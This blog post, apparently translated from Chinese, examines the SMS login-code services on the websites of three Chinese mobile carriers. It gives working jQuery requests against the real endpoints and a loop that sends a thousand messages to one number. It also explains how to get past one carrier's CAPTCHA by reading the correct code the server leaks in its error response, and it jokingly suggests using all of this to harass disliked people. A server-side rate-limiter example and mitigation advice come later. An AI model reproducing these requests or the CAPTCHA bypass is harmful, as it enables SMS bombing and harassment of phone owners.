The SMS random-code sending services on the websites of the three major mobile carriers can be called at will.


I have been working on SMS verification codes for my own website over the past two days, and it reminded me that when logging on to the websites of the three mobile carriers, the site sends a text message containing a random code, which you then enter to log in. On analysis, I found that all three carriers send the random-code SMS through an Ajax request, which means a third-party program can call it automatically. Let's look at them one by one.

First, China Unicom's website:

URL: http://www.10010.com/

The logon page is as follows:

Clicking it generates a random password for the entered number and sends it to that phone by SMS. Looking at the client script in the Chrome console, I found there is no limit on the number of requests or on their timing, as long as the number belongs to China Unicom. So I used jQuery to call the Ajax endpoint; the snippet is as follows. If you are interested, you can use this code to send harassing SMS to China Unicom users you dislike (I will not write out the phone number, heh).

    $.ajax({
        cache: false,
        type: "GET",
        url: "http://www.10010.com/login/sendRadomPassword.action",
        data: "mobile=132********"
    });

The above example sends a single request. If you insist on there being a limit, it is simply however many times you loop, 10 thousand or a million. For example:

    var sendTimes = 1000;
    while (sendTimes > 0) {
        $.ajax({
            cache: false,
            type: "GET",
            url: "http://www.10010.com/login/sendRadomPassword.action",
            data: "mobile=132********"
        });
        sendTimes--;
    }

Next it's China Mobile's turn:

China Mobile home site: http://www.bj.10086.cn

The login screen is as follows:

The SMS code can be requested once a minute. Looking at the client code, I found that it not only has this client-side restriction but also a number of server-side restrictions, each of which returns a status code. I sorted the status codes as follows:

Status code   Description
ok            The random text message password has been sent successfully. Please check it!
limit         Up to three random text messages can be sent every two minutes. Please try again later!
errornum      An error occurred in the additional code entered. Please try again!
errormobile   Incorrect mobile phone number. Please use a Beijing Mobile number to log on!
denyservice   You are not authorized to use the membership service of Beijing Mobile!
deny          You are not authorized to use the membership service of Beijing Mobile!
errtime       The SMS password can be obtained only once per minute
errcount      Up to 10 SMS passwords can be obtained per day
others        Failed to send. Please try again!

The programmers who built the Mobile website are of a decent level; designing this many states shows they are not beginners. The calling code is as follows:

    var mobile = "152********";
    $.post("http://www.bj.10086.cn/passport/SendTmpNum?wwwreq=false&mobile=" + mobile + "&logintype=2&rnum=&backurl=");

Although it is rate-limited and cannot be sent in batches, you can still send someone a few text messages at intervals in the middle of the night, and the recipient will have no idea why random codes are being sent to them, haha.
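The status codes in the table above describe a throttling policy, and the suggestions at the end of this article ask for exactly that kind of per-client, server-side restriction. The following is an added example, not the carrier's code, of how such a policy can be enforced on the server. It assumes the limits are keyed both by the target number (once per minute, ten per day) and by the requesting client, identified by session id or source IP (three sends per two minutes), and it assumes an 11-digit number format; the class and function names are mine. The clock is injectable so the policy can be exercised without waiting.

```javascript
// Added example (not the carrier's code): server-side throttling for an SMS
// one-time-code endpoint, returning the status codes from the table above.
// Assumptions: limits are keyed by the target number AND by the requesting
// client (session id or source IP); window lengths follow the table wording.

const ONE_MINUTE = 60 * 1000;
const ONE_DAY = 24 * 60 * ONE_MINUTE;

const POLICY = {
  perMobileMinInterval: ONE_MINUTE,   // errtime: one code per number per minute
  perMobileDailyMax: 10,              // errcount: at most ten codes per number per day
  perClientWindow: 2 * ONE_MINUTE,    // limit: at most three sends per client per two minutes
  perClientMax: 3,
};

// Assumed number format: 11 digits starting with 1 (mainland mobile numbers).
const MOBILE_RE = /^1\d{10}$/;

// Drop timestamps at or before `cutoff` from an ascending array, in place.
function pruneOlderThan(timestamps, cutoff) {
  while (timestamps.length > 0 && timestamps[0] <= cutoff) timestamps.shift();
}

class SmsCodeLimiter {
  // `now` is injectable so the policy can be tested without real waiting.
  constructor(now = () => Date.now()) {
    this.now = now;
    this.sendsByMobile = new Map(); // mobile -> ascending send timestamps (last 24 h)
    this.sendsByClient = new Map(); // clientId -> ascending send timestamps (last 2 min)
  }

  // Decide whether a send is allowed; only an "ok" decision is recorded.
  request(clientId, mobile) {
    if (!MOBILE_RE.test(mobile)) return "errormobile";
    const t = this.now();

    const mobileSends = this.sendsByMobile.get(mobile) || [];
    pruneOlderThan(mobileSends, t - ONE_DAY);
    const clientSends = this.sendsByClient.get(clientId) || [];
    pruneOlderThan(clientSends, t - POLICY.perClientWindow);

    // Most specific reason first: the per-number interval, then the daily cap,
    // then the per-client window that catches one client spraying many numbers.
    const lastToMobile = mobileSends[mobileSends.length - 1];
    if (lastToMobile !== undefined && t - lastToMobile < POLICY.perMobileMinInterval) return "errtime";
    if (mobileSends.length >= POLICY.perMobileDailyMax) return "errcount";
    if (clientSends.length >= POLICY.perClientMax) return "limit";

    mobileSends.push(t);
    clientSends.push(t);
    this.sendsByMobile.set(mobile, mobileSends);
    this.sendsByClient.set(clientId, clientSends);
    return "ok";
  }
}

// Walk-through with a fake clock and constructed numbers: one client
// requesting codes for several numbers in quick succession.
function demo() {
  let clock = 0;
  const limiter = new SmsCodeLimiter(() => clock);
  const decisions = [];
  decisions.push(limiter.request("client-a", "15200000000")); // ok
  decisions.push(limiter.request("client-a", "15200000000")); // errtime: same number within a minute
  clock += ONE_MINUTE;
  decisions.push(limiter.request("client-a", "15200000001")); // ok
  decisions.push(limiter.request("client-a", "15200000002")); // ok
  decisions.push(limiter.request("client-a", "15200000003")); // limit: three sends already in two minutes
  decisions.push(limiter.request("client-a", "abc"));         // errormobile
  return decisions;
}

console.log(demo());
```

Keying on the target number alone would stop repeated codes to one victim but not one client spraying many numbers; keying on the client alone would do the reverse. Both keys together are what make the "limit" and "errtime" codes in the table meaningful, and the per-day cap bounds the damage even from a client that rotates identities slowly.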

China Telecom:

Next, let's talk about China Telecom, which has done quite well in one respect but is very silly in another. Here is my analysis.

Login page address: http://bj.ct10000.com/login

What they did is require a correct image verification code before the random-password SMS is sent. The call method is as follows:

    $.ajax({
        cache: false,
        type: "GET",
        url: "http://bj.ct10000.com/login/fetchMessage.action",
        data: "custauthenticatein.queryvalue=189********&randcode=sa3r"
    });

The URL above requires both the mobile phone number and the image verification code in the data. Since we do not know the verification code shown in the image, the call cannot succeed on its own; however, the Telecom website programmer helps us a great deal, because even when the verification code is incorrect, he returns a lot of data. The following is the JSON string returned when the verification code is incorrect:

    {
        "about_menu": 0,
        "custauthenticatein": {
            "areacode": null,
            "contactid": null,
            "password": null,
            "pwdtype": null,
            "querytype": null,
            "queryvalue": "189********",
            "serialid": null,
            "systemid": null
        },
        "defaultlogintype": 0,
        "defaultpwdtype": 0,
        "info": null,
        "logintypemap": null,
        "ps": null,
        "psshop": null,
        "pwdtypemap": null,
        "randcode": "sa3r",
        "retinfo": null,
        "tip": "Incorrect verification code",
        "validatecode": null
    }

The randcode above is the made-up verification code we just submitted, and validatecode is the correct verification code stored on the server. Here validatecode is null because we have not yet requested the verification code image; if we first send a request for the verification code image path, validatecode will no longer be empty.

The Telecom verification code image path is http://bj.ct10000.com/authImg?type=0. I requested this address in the browser address bar; of course you can request it with JS as well. Then, sending the Ajax request above again, we get the following output:

    {
        "about_menu": 0,
        "custauthenticatein": {
            "areacode": null,
            "contactid": null,
            "password": null,
            "pwdtype": null,
            "querytype": null,
            "queryvalue": "189********",
            "serialid": null,
            "systemid": null
        },
        "defaultlogintype": 0,
        "defaultpwdtype": 0,
        "info": null,
        "logintypemap": null,
        "ps": null,
        "psshop": null,
        "pwdtypemap": null,
        "randcode": "sa3r",
        "retinfo": null,
        "tip": "Incorrect verification code",
        "validatecode": "g9dr"
    }

The response above has already told me validatecode = g9dr, which is exactly the text on the verification code image I just requested. So I now have the correct verification code; put it into the data of the Ajax request above and loop the request as many times as you like. There appears to be no limit on count or timing; if you insist on a limit, I'd say it's 10 thousand times. Well, that is China Telecom's random code.

Summary:

1. China Unicom's SMS random-code service address has no restrictions at all, which is obviously wrong.

2. Mobile uses server-side restrictions: for the same client there are many limits and rules, with clear status codes.

3. China Telecom's idea is good: an image verification code is used first to stop robots from sending requests. However, when the image verification code is wrong, the correct verification code must not be returned to the client.


My suggestions:

1. Client-side code is inherently insecure. Even though today's jQuery-style libraries make the client more powerful and richer, it cannot be trusted: with Chrome's console you can modify the data and scripts on a web page at will. So the client must not store sensitive information, and the server must take full responsibility for all necessary validation of client input, re-verifying everything on the server side.

2. Restrict cross-origin access. Skilled programmers have ways around it, but it at least raises the bar.

3. The server should impose per-client restrictions on services such as email verification and SMS sending, like Mobile's rate limits and Telecom's verification code.

4. Encrypt or obfuscate the client-side JS code (or load it dynamically), making it harder for others to understand your program and to work out your call method by watching the web requests.

5. Use ciphertext.

Of the suggestions above, the most reliable is the server-side one; of course, it is best to do all five. More and better suggestions are welcome for discussion.

Okay, that's it. Don't use the code in this article to harass others (though I am not against using programs to harass the fake-certificate sellers!). We just need to take away some experience and lessons.
